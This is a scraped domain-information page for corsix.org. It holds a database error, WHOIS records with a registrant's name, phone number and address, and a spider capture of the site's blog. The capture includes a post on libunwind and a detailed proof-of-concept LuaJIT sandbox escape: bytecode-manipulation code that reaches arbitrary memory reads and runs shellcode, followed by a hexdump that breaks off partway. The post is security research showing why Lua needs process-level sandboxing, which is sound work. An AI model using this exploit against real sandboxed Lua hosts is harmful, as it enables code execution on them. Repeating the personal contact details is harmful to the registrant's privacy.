INSERT INTO sites(host) VALUES('corsix.org') 1045: Access denied for user 'www-data'@'localhost' (using password: NO) corsix.org Estimated Worth $436,312 - MYIP.NET Website Information
Welcome to MyIP.net!
 Set MYIP as homepage      

  
           

Web Page Information

Title:
Meta Description:
Meta Keywords:
sponsored links:
Links:
Images:
Age:
sponsored links:

Traffic and Estimation

Traffic:
Estimation:

Website Ranks

Alexa Rank:
Google Page Rank:
Sogou Rank:
Baidu Cache:

Search Engine Indexed

Search EngineIndexedLinks
 Google:
 Bing:
 Yahoo!:
 Baidu:
 Sogou:
 Youdao:
 Soso:

Server Data

Web Server:
IP address:    
Location:

Registry information

Registrant:
Email:
ICANN Registrar:
Created:
Updated:
Expires:
Status:
Name Server:
Whois Server:

Alexa Rank and trends

Traffic: Today One Week Avg. Three Mon. Avg.
Rank:
PV:
Unique IP:

More ranks in the world

Users from these countries/regions

Where people go on this site

Alexa Charts

Alexa Reach and Rank

Whois data

Who is corsix.org at org.whois-servers.net

Domain Name: CORSIX.ORG

Domain ID: D124748511-LROR

WHOIS Server:

Referral URL: http://www.godaddy.com

Updated Date: 2016-06-19T10:44:00Z

Creation Date: 2006-06-18T10:44:59Z

Registry Expiry Date: 2020-06-18T10:44:59Z

Sponsoring Registrar: GoDaddy.com, LLC

Sponsoring Registrar IANA ID: 146

Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited

Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited

Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited

Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited

Registrant ID: CR13392603

Registrant Name: Peter Cawley

Registrant Organization:

Registrant Street: XTX Markets

Registrant Street: Leconfield House, Curzon Street

Registrant City: London

Registrant State/Province:

Registrant Postal Code: W1J 5JA

Registrant Country: GB

Registrant Phone: +44.7854982956

Registrant Phone Ext:

Registrant Fax:

Registrant Fax Ext:

Registrant Email: corsix

Admin ID: CR13392612

Admin Name: Peter Cawley

Admin Organization:

Admin Street: XTX Markets

Admin Street: Leconfield House, Curzon Street

Admin City: London

Admin State/Province:

Admin Postal Code: W1J 5JA

Admin Country: GB

Admin Phone: +44.7854982956

Admin Phone Ext:

Admin Fax:

Admin Fax Ext:

Admin Email: corsix

Tech ID: CR13392611

Tech Name: Peter Cawley

Tech Organization:

Tech Street: XTX Markets

Tech Street: Leconfield House, Curzon Street

Tech City: London

Tech State/Province:

Tech Postal Code: W1J 5JA

Tech Country: GB

Tech Phone: +44.7854982956

Tech Phone Ext:

Tech Fax:

Tech Fax Ext:

Tech Email: corsix

Name Server: woz.ns.cloudflare.com

Name Server: rosa.ns.cloudflare.com

DNSSEC: unsigned

>>> Last update of WHOIS database: 2016-10-20T23:17:19Z <<<



For more information on Whois status codes, please visit https://icann.org/epp



Access to Public Interest Registry WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the Public Interest Registry registry database. The data in this record is provided by Public Interest

Registry for informational purposes only, and Public Interest Registry does not guarantee its accuracy. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances

will you use this data to(a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) e

nable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Afilias except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. Publi

c Interest Registry reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.

Front Page Thumbnail

sponsored links:

Front Page Loading Time

Keyword Hits (Biger,better)

Other TLDs of corsix

TLDs Created Expires Registered
.com
.net
.org
.cn
.com.cn
.asia
.mobi

Similar Websites

More...
Alexa鏍囬

Search Engine Spider Emulation

Title:corsix.org
Description:
Keywords:PyObject *, PyObject *, PyObject *);
Body:
corsix.org
codecorsix.org - a blogcode
rarrhk;
On libunwind and dynamically generated code on x86-64
Posted on January 7, 2016
libunwind is a - supposedly portable - library for performing native stack unwinding. In simple scenarios, the library does its job fairly well, however, things get more interesting in the presence of dynamically-generated (vis-脿-vis JIT-compiled) code. In fact, on any platform, and in any context, unwinding native stacks in the presence of dynamically-generated code is an interesting topic. It so happens that the Windows API gets this right, presenting you with two different options, with it being sufficient to go with either option:
Construct some RUNTIME_FUNCTION data structures up front, and then call RtlAddFunctionTable.
Call RtlInstallFunctionTableCallback, and then construct RUNTIME_FUNCTION data structures lazily on demand (this is exactly the interface that a JIT compiler would want, and perhaps it was designed with one in mind).
I feel that Linux doesn't really get this right. Rather than there being a single OS-supplied interface, every tool has its own way of doing things:
libunwind: Construct ELF .debug_frame data structures, and table_entry data structures, and a unw_dyn_table_info data structure, and a unw_dyn_info_t structure, then call _U_dyn_register.
C++ exception unwinder: Construct ELF .eh_frame data structures, then call __register_frame (I'd like to link to some documentation on __register_frame, but Google doesn't immediately find anything, so I assume that there isn't any).
GDB: Construct a full in-memory ELF object, manually maintain a doubly-linked list of all such objects in a global variable called __jit_debug_descriptor, and call a global function called __jit_debug_register_code when this list is changed (though it seems baroque, this is documented quite well).
All three of these interfaces require data structures to be generated up-front, which isn't ideal for JIT compilers, but I digress (though possibly in some cases, creative use of PROT_NONE pages and SIGSEGV handlers could allow some degree of lazy on-demand generation). That all three interfaces consume different data is annoying. That .eh_frame and .debug_frame are subtly different is also annoying, but I digress again.
Though libunwind presents an interface, it happens to be poorly documented and poorly implemented for x86-64. In particular, if you read the documentation, then you'd be left with the impression that unw_dyn_info_t can refer to either a unw_dyn_proc_info_t structure (UNW_INFO_FORMAT_DYNAMIC), or a unw_dyn_table_info structure (UNW_INFO_FORMAT_REMOTE_TABLE or UNW_INFO_FORMAT_TABLE). On the former structure, the documentation has the following to say:
This is the preferred dynamic unwind-info format and it is generally the one used by full-blown runtime code-generators. In this format, the details of a procedure are described by a structure of type unw_dyn_proc_info_t.
Let me save you some time by pointing out that unwind directives for unw_dyn_proc_info_t structures plain aren't implemented on x86-64. As such, using unw_dyn_proc_info_t is a non-starter if you actually want to do any unwinding. Consequently, the only option is to use unw_dyn_table_info. The most interesting field of unw_dyn_table_info is table_data, the documentation for which states:
A pointer to the actual data encoding the unwind-info. The exact format is architecture-specific (see architecture-specific sections below).
Of course, there are no such notes below with reference to x86-64. Let me save you some time by pointing out that the table_data field should refer to an array of table_entry structures (which aren't documented, or present in any header, but can be found in the source). In turn, the fde_offset field of that structure should refer to a DWARF FDE in .debug_frame style.
After supplying unwind information via UNW_INFO_FORMAT_TABLE, libunwind is capable of unwinding over call frames for dynamically-generated code on x86-64. After getting basic unwinding working, one might like to make libunwind supply a useful function name for the call frame. The unw_dyn_table_info structure contains a name_ptr field which looks perfect for this task, but the code which should read this field instead just returns UNW_ENOINFO for UNW_INFO_FORMAT_TABLE (or, it would, but UNW_EINVAL is also likely, as the enclosing switch statement should be on pi.format rather than di- gt;format). The observant reader will spot that this name-related logic is fully implemented for UNW_INFO_FORMAT_DYNAMIC, leaving us in a sad situation on x86-64: use UNW_INFO_FORMAT_DYNAMIC and get names but no unwinding, or use UNW_INFO_FORMAT_TABLE and get unwinding but no names.
I'd like to finish on a positive note instead of that sad note, but alas, this is a tale of woe.
rarrhk;
Malicious LuaJIT bytecode
Posted on November 11, 2015
I have previously written about how malicious bytecode can be used to escape from a Lua 5.1 sandbox on 32-bit Windows, and other people have applied the same methods to attack redis instances.
It should come as no surprise that LuaJIT (as opposed to plain PUC-Rio non-JIT Lua) also has bytecode which can be used to escape from sandboxes, but it is nevertheless illustrative to work through the details of a full sandbox escape. The conclusion, as should be accepted knowledge by now, is that Lua should be sandboxed at the operating-system-process level, as opposed to at the Lua level.
For the purposes of this exercise, we'll escape from the following sandbox:
codespan class="hljs-preprocessor"#span class="hljs-keyword"includespan lt;lauxlib.h gt;span
span class="hljs-preprocessor"#span class="hljs-keyword"includespan lt;lualib.h gt;span
span class="hljs-function"span class="hljs-keyword"intspan span class="hljs-title"mainspanspan class="hljs-params"()span span{
lua_State* L = luaL_newstate();
lua_cpcall(L, luaopen_jit, NULL);
luaL_dofile(L, span class="hljs-string""evil.lua"span);
lua_close(L);
}
code
The sandbox executes arbitrary Lua code of our choice (the evil.lua file), and our aim is to escalate up to executing arbitrary native code of our choice. If the sandbox exposed LuaJIT's standard ffi library, then this would be trivial: call ffi.cdef to declare a prototype for mprotect (or VirtualProtect on Windows), call mprotect on some shellcode to make it executable, call ffi.cast to get a function pointer for the shellcode, and then call the function pointer. Of course, the sandbox does not expose the ffi library - nor does it expose the base library (hence no tostring or print or etc.) or the package library (no require) or the string library (no string manipulation) or any other useful library. As its sole concession, the sandbox does load the jit library, as this library must be loaded in order for LuaJIT to actually do JIT compilation.
The particular environment we'll attack is LuaJIT commit 4f87367b (head of the v2.1 branch at time of writing), running on an x86_64 flavour of either Mac OSX or Linux, and compiled with LJ_64=1 and LJ_GC64=0 and LJ_FR2=0 (these being the current defaults for LuaJIT on x86_64).
The evil.lua file that we'll end up using will contain LuaJIT bytecode rather than Lua source code. Writing bytecode by hand is somewhat arduous, so instead we'll write Lua source code, compile it to bytecode, and then make a few surgical tweaks to the bytecode. The following rather long block of contains both the Lua source code to be compiled and manipulated, and the Lua source code for performing the compilation and manipulation.
codespan class="hljs-comment"-- The following function serves as the template for evil.lua.span
span class="hljs-comment"-- The general outline is to compile this function as-written, dumpspan
span class="hljs-comment"-- it to bytecode, manipulate the bytecode a bit, and then save thespan
span class="hljs-comment"-- result as evil.lua.span
span class="hljs-keyword"localspan evil = span class="hljs-function"span class="hljs-keyword"functionspanspan class="hljs-params"(v)spanspan
span class="hljs-comment"-- This is the x86_64 native code which we'll execute. Itspan
span class="hljs-comment"-- is a very benign payload which just prints "Hello World"span
span class="hljs-comment"-- and then fixes up some broken state.span
span class="hljs-keyword"localspan shellcode =
span class="hljs-string""\76\139\87\16"span.. span class="hljs-comment"-- mov r10, [rdi+16]span
span class="hljs-string""\184\4\0\0\2"span.. span class="hljs-comment"-- mov eax, 0x2000004span
span class="hljs-string""\191\1\0\0\0"span.. span class="hljs-comment"-- mov edi, 1span
span class="hljs-string""\72\141\53\51\0\0\0"span.. span class="hljs-comment"-- lea rsi, [- gt;msg]span
span class="hljs-string""\186\12\0\0\0"span.. span class="hljs-comment"-- mov edx, 12span
span class="hljs-string""\15\5"span.. span class="hljs-comment"-- syscallspan
span class="hljs-string""\72\133\192"span.. span class="hljs-comment"-- test rax, raxspan
span class="hljs-string""\184\74\0\0\2"span.. span class="hljs-comment"-- mov eax, 0x200004aspan
span class="hljs-string""\121\12"span.. span class="hljs-comment"-- jns - gt;is_osxspan
span class="hljs-string""\184\1\0\0\0"span.. span class="hljs-comment"-- mov eax, 1span
span class="hljs-string""\15\5"span.. span class="hljs-comment"-- syscallspan
span class="hljs-string""\184\10\0\0\0"span.. span class="hljs-comment"-- mov eax, 10span
span class="hljs-comment"-- - gt;is_osx:span
span class="hljs-string""\73\139\58"span.. span class="hljs-comment"-- mov rdi, [r10]span
span class="hljs-string""\72\139\119\8"span.. span class="hljs-comment"-- mov rsi, [rdi+8]span
span class="hljs-string""\186\7\0\0\0"span.. span class="hljs-comment"-- mov edx, 7span
span class="hljs-string""\15\5"span.. span class="hljs-comment"-- syscallspan
span class="hljs-string""\73\139\114\8"span.. span class="hljs-comment"-- mov rsi, [r10+8]span
span class="hljs-string""\72\137\55"span.. span class="hljs-comment"-- mov [rdi], rsispan
span class="hljs-string""\195"span.. span class="hljs-comment"-- retspan
span class="hljs-comment"-- - gt;msg:span
span class="hljs-string""Hello World\n"span
span class="hljs-comment"-- The dirty work is done by the following "inner" function.span
span class="hljs-comment"-- This inner function exists because we require a vararg callspan
span class="hljs-comment"-- frame on the Lua stack, and for the function associated withspan
span class="hljs-comment"-- said frame to have certain special upvalues.span
span class="hljs-keyword"localspan span class="hljs-function"span class="hljs-keyword"functionspan span class="hljs-title"innerspanspan class="hljs-params"(...)spanspan
span class="hljs-keyword"ifspan span class="hljs-keyword"falsespan span class="hljs-keyword"thenspan
span class="hljs-comment"-- The following three lines turn into three bytecodespan
span class="hljs-comment"-- instructions. We munge the bytecode slightly, and thenspan
span class="hljs-comment"-- later reinterpret the instructions as a cdata object,span
span class="hljs-comment"-- which will end up being `cdata lt;const char * gt;: NULL`.span
span class="hljs-comment"-- The `if false` wrapper ensures that the munged bytecodespan
span class="hljs-comment"-- isn't executed.span
span class="hljs-keyword"localspan cdata = -span class="hljs-number"32749span
cdata = span class="hljs-number"0span
cdata = span class="hljs-number"0span
span class="hljs-keyword"endspan
span class="hljs-comment"-- Through the power of bytecode manipulation, thespan
span class="hljs-comment"-- following three functions will become (the fast paths of)span
span class="hljs-comment"-- string.byte, string.char, and string.sub. This isspan
span class="hljs-comment"-- possible because LuaJIT has bytecode instructionsspan
span class="hljs-comment"-- corresponding to the fast paths of said functions. Notespan
span class="hljs-comment"-- that we musn't stray from the fast path (because thespan
span class="hljs-comment"-- fallback C code won't be wired up). Also note that thespan
span class="hljs-comment"-- interpreter state will be slightly messed up afterspan
span class="hljs-comment"-- calling one of these functions.span
span class="hljs-keyword"localspan span class="hljs-function"span class="hljs-keyword"functionspan span class="hljs-title"s_bytespanspan class="hljs-params"(s)spanspan span class="hljs-keyword"endspan
span class="hljs-keyword"localspan span class="hljs-function"span class="hljs-keyword"functionspan span class="hljs-title"s_charspanspan class="hljs-params"(i, _)spanspan span class="hljs-keyword"endspan
span class="hljs-keyword"localspan span class="hljs-function"span class="hljs-keyword"functionspan span class="hljs-title"s_subspanspan class="hljs-params"(s, i, j)spanspan span class="hljs-keyword"endspan
span class="hljs-comment"-- The following function does nothing, but calling it willspan
span class="hljs-comment"-- restore the interpreter state which was messed up followingspan
span class="hljs-comment"-- a call to one of the previous three functions. Because thisspan
span class="hljs-comment"-- function contains a cdata literal, loading it from bytecodespan
span class="hljs-comment"-- will result in the ffi library being initialised (but notspan
span class="hljs-comment"-- registered in the global namespace).span
span class="hljs-keyword"localspan span class="hljs-function"span class="hljs-keyword"functionspan span class="hljs-title"resyncspanspan class="hljs-params"()spanspan span class="hljs-keyword"returnspan span class="hljs-number"0spanLL span class="hljs-keyword"endspan
span class="hljs-comment"-- Helper function to reinterpret the first four bytes of aspan
span class="hljs-comment"-- string as a uint32_t, and return said value as a number.span
span class="hljs-keyword"localspan span class="hljs-function"span class="hljs-keyword"functionspan span class="hljs-title"s_uint32spanspan class="hljs-params"(s)spanspan
span class="hljs-keyword"localspan result = span class="hljs-number"0span
span class="hljs-keyword"forspan i = span class="hljs-number"4span, span class="hljs-number"1span, -span class="hljs-number"1span span class="hljs-keyword"dospan
result = result * span class="hljs-number"256span + s_byte(s_sub(s, i, i))
resync()
span class="hljs-keyword"endspan
span class="hljs-keyword"returnspan result
span class="hljs-keyword"endspan
span class="hljs-comment"-- The following line obtains the address of the GCfuncLspan
span class="hljs-comment"-- object corresponding to "inner". As written, it just fetchesspan
span class="hljs-comment"-- the 0th upvalue, and does some arithmetic. After somespan
span class="hljs-comment"-- bytecode manipulation, the 0th upvalue ends up pointingspan
span class="hljs-comment"-- somewhere very interesting: the frame info TValue containingspan
span class="hljs-comment"-- func|FRAME_VARG|delta. Because delta is small, this TValuespan
span class="hljs-comment"-- will end up being a denormalised number, from which we canspan
span class="hljs-comment"-- easily pull out 32 bits to give us the "func" part.span
span class="hljs-keyword"localspan iaddr = (inner * span class="hljs-number"2span^span class="hljs-number"1022span * span class="hljs-number"2span^span class="hljs-number"52span) % span class="hljs-number"2span^span class="hljs-number"32span
span class="hljs-comment"-- The following five lines read the "pc" field of the GCfuncLspan
span class="hljs-comment"-- we just obtained. This is done by creating a GCstr objectspan
span class="hljs-comment"-- overlaying the GCfuncL, and then pulling some bytes out ofspan
span class="hljs-comment"-- the string. Bytecode manipulation results in a nice KPRIspan
span class="hljs-comment"-- instruction which preserves the low 32 bits of the istrspan
span class="hljs-comment"-- TValue while changing the high 32 bits to specify that thespan
span class="hljs-comment"-- low 32 bits contain a GCstr*.span
span class="hljs-keyword"localspan istr = (iaddr - span class="hljs-number"4span) + span class="hljs-number"2span^span class="hljs-number"52span
istr = -span class="hljs-number"32764span span class="hljs-comment"-- Turned into KPRI(str)span
span class="hljs-keyword"localspan pc = s_sub(istr, span class="hljs-number"5span, span class="hljs-number"8span)
istr = resync()
pc = s_uint32(pc)
span class="hljs-comment"-- The following three lines result in the local variablespan
span class="hljs-comment"-- called "memory" being `cdata lt;const char * gt;: NULL`. We canspan
span class="hljs-comment"-- subsequently use this variable to read arbitrary memoryspan
span class="hljs-comment"-- (one byte at a time). Note again the KPRI trick to changespan
span class="hljs-comment"-- the high 32 bits of a TValue. In this case, the low 32 bitsspan
span class="hljs-comment"-- end up pointing to the bytecode instructions at the top ofspan
span class="hljs-comment"-- this function wrapped in `if false`.span
span class="hljs-keyword"localspan memory = (pc + span class="hljs-number"8span) + span class="hljs-number"2span^span class="hljs-number"52span
memory = -span class="hljs-number"32758span span class="hljs-comment"-- Turned into KPRI(cdata)span
memory = memory + span class="hljs-number"0span
span class="hljs-comment"-- Helper function to read a uint32_t from any memory location.span
span class="hljs-keyword"localspan span class="hljs-function"span class="hljs-keyword"functionspan span class="hljs-title"m_uint32spanspan class="hljs-params"(offs)spanspan
span class="hljs-keyword"localspan result = span class="hljs-number"0span
span class="hljs-keyword"forspan i = offs + span class="hljs-number"3span, offs, -span class="hljs-number"1span span class="hljs-keyword"dospan
result = result * span class="hljs-number"256span + (memory[i] % span class="hljs-number"256span)
span class="hljs-keyword"endspan
span class="hljs-keyword"returnspan result
span class="hljs-keyword"endspan
span class="hljs-comment"-- Helper function to extract the low 32 bits of a TValue.span
span class="hljs-comment"-- In particular, for TValues containing a GCobj*, this givesspan
span class="hljs-comment"-- the GCobj* as a uint32_t. Note that the two memory readsspan
span class="hljs-comment"-- here are GCfuncL::uvptr[1] and GCupval::v.span
span class="hljs-keyword"localspan vaddr = m_uint32(m_uint32(iaddr + span class="hljs-number"24span) + span class="hljs-number"16span)
span class="hljs-keyword"localspan span class="hljs-function"span class="hljs-keyword"functionspan span class="hljs-title"low32spanspan class="hljs-params"(tv)spanspan
v = tv
span class="hljs-keyword"returnspan m_uint32(vaddr)
span class="hljs-keyword"endspan
span class="hljs-comment"-- Helper function which is the inverse of s_uint32: given aspan
span class="hljs-comment"-- 32 bit number, returns a four byte string.span
span class="hljs-keyword"localspan span class="hljs-function"span class="hljs-keyword"functionspan span class="hljs-title"ub4spanspan class="hljs-params"(n)spanspan
span class="hljs-keyword"localspan result = span class="hljs-string"""span
span class="hljs-keyword"forspan i = span class="hljs-number"0span, span class="hljs-number"3span span class="hljs-keyword"dospan
span class="hljs-keyword"localspan b = n % span class="hljs-number"256span
n = (n - b) / span class="hljs-number"256span
result = result .. s_char(b)
resync()
span class="hljs-keyword"endspan
span class="hljs-keyword"returnspan result
span class="hljs-keyword"endspan
span class="hljs-comment"-- The following four lines result in the local variablespan
span class="hljs-comment"-- called "mctab" containing a very special table: thespan
span class="hljs-comment"-- array part of the table points to the current Luaspan
span class="hljs-comment"-- universe's jit_State::patchins field. Consequently,span
span class="hljs-comment"-- the table's [0] through [4] fields allow access to thespan
span class="hljs-comment"-- mcprot, mcarea, mctop, mcbot, and szmcarea fields ofspan
span class="hljs-comment"-- the jit_State. Note that LuaJIT allocates the emptyspan
span class="hljs-comment"-- string within global_State, so a fixed offset from thespan
span class="hljs-comment"-- address of the empty string gives the fields we'respan
span class="hljs-comment"-- after within jit_State.span
span class="hljs-keyword"localspan mctab_s = span class="hljs-string""\0\0\0\0\99\4\0\0"span.. ub4(low32(span class="hljs-string"""span) + span class="hljs-number"2748span)
..span class="hljs-string""\0\0\0\0\0\0\0\0\0\0\0\0\5\0\0\0\255\255\255\255"span
span class="hljs-keyword"localspan mctab = low32(mctab_s) + span class="hljs-number"16span + span class="hljs-number"2span^span class="hljs-number"52span
mctab = -span class="hljs-number"32757span span class="hljs-comment"-- Turned into KPRI(table)span
span class="hljs-comment"-- Construct a string consisting of 4096 x86 NOP instructions.span
span class="hljs-keyword"localspan nop4k = span class="hljs-string""\144"span
span class="hljs-keyword"forspan i = span class="hljs-number"1span, span class="hljs-number"12span span class="hljs-keyword"dospan nop4k = nop4k .. nop4k span class="hljs-keyword"endspan
span class="hljs-comment"-- Create a copy of the shellcode which is page aligned, andspan
span class="hljs-comment"-- at least one page big, and obtain its address in "asaddr".span
span class="hljs-keyword"localspan ashellcode = nop4k .. shellcode .. nop4k
span class="hljs-keyword"localspan asaddr = low32(ashellcode) + span class="hljs-number"16span
asaddr = asaddr + span class="hljs-number"2span^span class="hljs-number"12span - (asaddr % span class="hljs-number"2span^span class="hljs-number"12span)
span class="hljs-comment"-- The following seven lines result in the memory protection ofspan
span class="hljs-comment"-- the page at asaddr changing from read/write to read/execute.span
span class="hljs-comment"-- This is done by setting the jit_State::mcarea and szmcareaspan
span class="hljs-comment"-- fields to specify the page in question, setting the mctop andspan
span class="hljs-comment"-- mcbot fields to an empty subrange of said page, and thenspan
span class="hljs-comment"-- triggering some JIT compilation. As a somewhat unfortunatespan
span class="hljs-comment"-- side-effect, the page at asaddr is added to the jit_State'sspan
span class="hljs-comment"-- linked-list of mcode areas (the shellcode unlinks it).span
span class="hljs-keyword"localspan mcarea = mctab[span class="hljs-number"1span]
mctab[span class="hljs-number"0span] = span class="hljs-number"0span
mctab[span class="hljs-number"1span] = asaddr / span class="hljs-number"2span^span class="hljs-number"52span / span class="hljs-number"2span^span class="hljs-number"1022span
mctab[span class="hljs-number"2span] = mctab[span class="hljs-number"1span]
mctab[span class="hljs-number"3span] = mctab[span class="hljs-number"1span]
mctab[span class="hljs-number"4span] = span class="hljs-number"2span^span class="hljs-number"12span / span class="hljs-number"2span^span class="hljs-number"52span / span class="hljs-number"2span^span class="hljs-number"1022span
span class="hljs-keyword"whilespan mctab[span class="hljs-number"0span] == span class="hljs-number"0span span class="hljs-keyword"dospan span class="hljs-keyword"endspan
span class="hljs-comment"-- The following three lines construct a GCfuncC objectspan
span class="hljs-comment"-- whose lua_CFunction field is set to asaddr. A fixedspan
span class="hljs-comment"-- offset from the address of the empty string gives usspan
span class="hljs-comment"-- the global_State::bc_cfunc_int field.span
span class="hljs-keyword"localspan fshellcode = ub4(low32(span class="hljs-string"""span) + span class="hljs-number"132span) ..span class="hljs-string""\0\0\0\0"span..
ub4(asaddr) ..span class="hljs-string""\0\0\0\0"span
fshellcode = -span class="hljs-number"32760span span class="hljs-comment"-- Turned into KPRI(func)span
span class="hljs-comment"-- Finally, we invoke the shellcode (and pass it some valuesspan
span class="hljs-comment"-- which allow it to remove the page at asaddr from the listspan
span class="hljs-comment"-- of mcode areas).span
fshellcode(mctab[span class="hljs-number"1span], mcarea)
span class="hljs-keyword"endspan
inner()
span class="hljs-keyword"endspan
span class="hljs-comment"-- Some helpers for manipulating bytecode:span
span class="hljs-keyword"localspan ffi = span class="hljs-built_in"requirespan span class="hljs-string""ffi"span
span class="hljs-keyword"localspan bit = span class="hljs-built_in"requirespan span class="hljs-string""bit"span
span class="hljs-keyword"localspan BC = {KSHORT = span class="hljs-number"41span, KPRI = span class="hljs-number"43span}
span class="hljs-comment"-- Dump the as-written evil function to bytecode:span
span class="hljs-keyword"localspan estr = span class="hljs-built_in"stringspan.dump(evil, span class="hljs-keyword"truespan)
span class="hljs-keyword"localspan buf = ffi.new(span class="hljs-string""uint8_t[?]"span, #estr+span class="hljs-number"1span, estr)
span class="hljs-keyword"localspan p = buf + span class="hljs-number"5span
span class="hljs-comment"-- Helper function to read a ULEB128 from p:span
span class="hljs-keyword"localspan span class="hljs-function"span class="hljs-keyword"functionspan span class="hljs-title"read_uleb128spanspan class="hljs-params"()spanspan
span class="hljs-keyword"localspan v = p[span class="hljs-number"0span]; p = p + span class="hljs-number"1span
span class="hljs-keyword"ifspan v gt;= span class="hljs-number"128span span class="hljs-keyword"thenspan
span class="hljs-keyword"localspan sh = span class="hljs-number"7span; v = v - span class="hljs-number"128span
span class="hljs-keyword"repeatspan
span class="hljs-keyword"localspan r = p[span class="hljs-number"0span]
v = v + bit.lshift(bit.band(r, span class="hljs-number"127span), sh)
sh = sh + span class="hljs-number"7span
p = p + span class="hljs-number"1span
span class="hljs-keyword"untilspan r lt; span class="hljs-number"128span
span class="hljs-keyword"endspan
span class="hljs-keyword"returnspan v
span class="hljs-keyword"endspan
span class="hljs-comment"-- The dumped bytecode contains several prototypes: one for "evil"span
span class="hljs-comment"-- itself, and one for every (transitive) inner function. We stepspan
span class="hljs-comment"-- through each prototype in turn, and tweak some of them.span
span class="hljs-keyword"whilespan span class="hljs-keyword"truespan span class="hljs-keyword"dospan
span class="hljs-keyword"localspan len = read_uleb128()
span class="hljs-keyword"ifspan len == span class="hljs-number"0span span class="hljs-keyword"thenspan span class="hljs-keyword"breakspan span class="hljs-keyword"endspan
span class="hljs-keyword"localspan pend = p + len
span class="hljs-keyword"localspan flags, numparams, framesize, sizeuv = p[span class="hljs-number"0span], p[span class="hljs-number"1span], p[span class="hljs-number"2span], p[span class="hljs-number"3span]
p = p + span class="hljs-number"4span
read_uleb128()
read_uleb128()
span class="hljs-keyword"localspan sizebc = read_uleb128()
span class="hljs-keyword"localspan bc = p
span class="hljs-keyword"localspan uv = ffi.cast(span class="hljs-string""uint16_t*"span, p + sizebc * span class="hljs-number"4span)
span class="hljs-keyword"ifspan numparams == span class="hljs-number"0span span class="hljs-keyword"andspan sizeuv == span class="hljs-number"3span span class="hljs-keyword"thenspan
span class="hljs-comment"-- This branch picks out the "inner" function.span
span class="hljs-comment"-- The first thing we do is change what the 0th upvaluespan
span class="hljs-comment"-- points at:span
uv[span class="hljs-number"0span] = uv[span class="hljs-number"0span] + span class="hljs-number"2span
span class="hljs-comment"-- Then we go through and change everything which was writtenspan
span class="hljs-comment"-- as "local_variable = -327XX" in the source to instead bespan
span class="hljs-comment"-- a KPRI instruction:span
span class="hljs-keyword"forspan i = span class="hljs-number"0span, sizebc span class="hljs-keyword"dospan
span class="hljs-keyword"ifspan bc[span class="hljs-number"0span] == BC.KSHORT span class="hljs-keyword"thenspan
span class="hljs-keyword"localspan rd = ffi.cast(span class="hljs-string""int16_t*"span, bc)[span class="hljs-number"1span]
span class="hljs-keyword"ifspan rd lt;= -span class="hljs-number"32749span span class="hljs-keyword"thenspan
bc[span class="hljs-number"0span] = BC.KPRI
bc[span class="hljs-number"3span] = span class="hljs-number"0span
span class="hljs-keyword"ifspan rd == -span class="hljs-number"32749span span class="hljs-keyword"thenspan
span class="hljs-comment"-- the `cdata = -32749` line in source also tweaksspan
span class="hljs-comment"-- the two instructions after it:span
bc[span class="hljs-number"4span] = span class="hljs-number"0span
bc[span class="hljs-number"8span] = span class="hljs-number"0span
span class="hljs-keyword"endspan
span class="hljs-keyword"endspan
span class="hljs-keyword"endspan
bc = bc + span class="hljs-number"4span
span class="hljs-keyword"endspan
span class="hljs-keyword"elseifspan sizebc == span class="hljs-number"1span span class="hljs-keyword"thenspan
span class="hljs-comment"-- As written, the s_byte, s_char, and s_sub functions eachspan
span class="hljs-comment"-- contain a single "return" instruction. We replace saidspan
span class="hljs-comment"-- instruction with the corresponding fast-function instruction.span
bc[span class="hljs-number"0span] = span class="hljs-number"147span + numparams
bc[span class="hljs-number"2span] = bit.band(span class="hljs-number"1span + numparams, span class="hljs-number"6span)
span class="hljs-keyword"endspan
p = pend
span class="hljs-keyword"endspan
span class="hljs-comment"-- Finally, save the manipulated bytecode as evil.lua:span
span class="hljs-keyword"localspan f = span class="hljs-built_in"iospan.open(span class="hljs-string""evil.lua"span, span class="hljs-string""wb"span)
f:write(ffi.span class="hljs-built_in"stringspan(buf, #estr))
f:close()
code
If we save the above as make_evil.lua, then we can execute it to create evil.lua:
code data-sourcepos="309:1-382:58"$ luajit make_evil.lua
$ file evil.lua
evil.lua: data
$ xxd evil.lua
0000000: 1b4c 4a02 060b 0001 0100 0000 0194 0002 .LJ.............
0000010: 000b 0002 0200 0000 0195 0002 000b 0003 ................
0000020: 0300 0000 0196 0004 0012 0400 0100 0100 ................
0000030: 0228 0000 004c 0002 0002 0000 5700 010c .(...L......W...
0000040: 0300 0112 2901 0000 2902 0400 2903 0100 ....)...)...)...
0000050: 2904 ffff 4d02 0c80 1806 0001 2d07 0000 )...M.......-...
0000060: 2d08 0100 1209 0000 120a 0500 120b 0500 -...............
0000070: 4208 0400 4107 0002 2001 0706 2d06 0200 B...A... ...-...
0000080: 4206 0101 4f02 f47f 4c01 0200 00c0 02c0 B...O...L.......
0000090: 03c0 8004 3c00 0108 0100 020c 2901 0000 .... lt;.......)...
00000a0: 1602 0000 1203 0000 2904 ffff 4d02 0680 ........)...M...
00000b0: 1806 0101 2d07 0000 3807 0507 1a07 0107 ....-...8.......
00000c0: 2001 0706 4f02 fa7f 4c01 0200 0880 0680 ...O...L.......
00000d0: 041d 0001 0303 0000 042e 0000 002d 0101 .............-..
00000e0: 002d 0202 0044 0102 0001 0009 c00a c052 .-...D.........R
00000f0: 0001 0a02 0101 1127 0100 0029 0200 0029 .......'...)...)
0000100: 0303 0029 0401 004d 020b 801a 0600 0021 ...)...M.......!
0000110: 0706 0019 0000 0712 0701 002d 0800 0012 ...........-....
0000120: 0906 0042 0802 0226 0108 072d 0701 0042 ...B... amp;...-...B
0000130: 0701 014f 02f5 7f4c 0102 0001 c003 c005 ...O...L........
0000140: 8004 9f04 0700 1703 0d0c 7158 0000 8058 ..........qX...X
0000150: 0003 802b 0013 0000 0000 0000 0000 0033 ...+...........3
0000160: 0000 0033 0101 0033 0202 0033 0303 0033 ...3...3...3...3
0000170: 0404 002d 0500 0018 0500 0518 0501 051a ...-............
0000180: 0502 0517 0603 0516 0601 062b 0604 0012 ...........+....
